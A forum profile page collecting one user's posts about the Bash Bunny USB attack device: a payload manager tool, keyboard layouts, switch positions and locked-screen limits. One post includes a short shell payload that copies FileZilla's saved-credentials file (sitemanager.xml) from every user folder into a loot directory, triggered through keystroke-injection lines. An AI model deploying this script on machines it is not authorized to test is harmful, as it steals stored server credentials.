Jump to content


Active Members
  • Posts

  • Joined

  • Last visited

  • Days Won


Posts posted by quentin.lamamy

  1. 5 minutes ago, Dave-ee Jones said:

    Sounds interesting, but the new BB Updater solves the problem of downloading payloads and updates.

    I don't know what is bb updater, sorry for the duplicate idea :/

    6 minutes ago, Dave-ee Jones said:

    Browsing payloads/tools from Github and downloading specific ones could be useful but I don't see how downloading the whole repo is a bad idea, as it's small anyway.

    Nop there is two choice, a third party api i host on my server to get info about the git or just parse the github

    11 minutes ago, Dave-ee Jones said:

    However it sounds interesting and could be nice to use. Though it sounds like we're going to need JavaScript to use it..does that mean it's based on a webserver?

    It's a node js app, so just need a node js. It can be use as a classic payload that run the tool, or in the bashbunny filesystem with a custom command binded to the tool. Like setup or something like that.

  2. Hi,

    It seems that lot of bb user are noob and don't succeed in using it. I am working on a tool based on node js with a terminal ui to manage the BB.

    The actual feature are :

    • Browse available payload from git
    • Install / Remove payload
    • Update firmware
    • Browse available tool from git
    • Install / Remove payload

    Is there some other feature that can be usefull ?

    Message for the moderator : Is this possible to stick this post to let people work on it without scrolling in forum history ?

  3. On 30/07/2017 at 7:47 PM, nokia1556 said:

    Hi ,

    Could we keep on chatting tonight?


    It's not a chat here...

    Just to be sure (maybe fast blinking doesn't means the same thing for you and me) do you have the responder tool in /tools/responder/ ?


  4. 13 minutes ago, nokia1556 said:

    We need someone that could help us vis skype , for example. We would pay for the help.

    All the folders that my BB creates are empty...

    I do not know haw to format it ...



    It's better to help you here so that all future user can read this topic and the solution. And you will not pay for it.

    Can you post your payload in code bloc


    • Upvote 1
  5. My BB is set in FR and my system in OSX keyboard FR.

    And this issue is resolved when the BB is set to FR and my system keyboard to PC Keyboard FR

    conclusion i need to set my BB to FR (OSX) and my system to OSX keyboard FR

  6. Hi,

    I have a sh script that exfiltrate files from the computer :

    function filezilla.exfiltration(){
         mkdir -p $1
         echo "Run path : $1" >> $1/run.txt 
         for d in /Users/*; do
              echo "User : $d" >> $1/run.txt
              if [ -d "$d" ]; then
                   if [ -f "$d/.filezilla/sitemanager.xml" ]; then
                        echo "sitemanager.xml detected" >> $1/run.txt
                        cp $d/.filezilla/sitemanager.xml $1/$(basename $d)_sitemanager.xml
                        echo "no sitemanager.xml detected" >> $1/run.txt      

    The argument is a loot folder

    When this script run in the terminal all works because /Users/ folder exist on the computer

    But when the BB call this function /Users refer to the BB filesystem. Is there a path i can use to refer to the computer filesystem  and avoid using this script

    Q STRING source /Volumes/Bashbunny/payloads/$SWITCH_POSITION/exfiltration.sh
    Q STRING filezilla.exfiltration /Volumes/Bashbunny/payloads/$SWITCH_POSITION/


  7. 21 minutes ago, Pinni3 said:

    the switch in Payload1 mode (Position in the middle ) it does  Testing Switch Position, Switch Position is switch2
    the switch in Payload2 mode (Position most outer  location from the USB connection ) it does Testing Switch Position, Switch Position is switch1

    The switch1 position is not in the middle, here is the scheme

     +----                 |   The Bash Bunny by Hak5 is a simple and powerful
     | : |    Boot Modes   |   multi-function USB attack and automation platform
     +----               * |   for penetration testers and systems administrators.
            ||+-- (sw1) Switch Position 1: Customizeable Payload.
            |+-- (sw2) Switch Position 2: Customizeable Payload.
            +-- (sw3) Switch Position 3: Arming Mode - Serial + Mass Storage.


    • Upvote 1
  8. You have to know that because of security reason a lot of bash function and some functionality are disable when a screen is locked (if you put the BB when is locked and not before), and more thing are disable when session is closed.


  • Create New...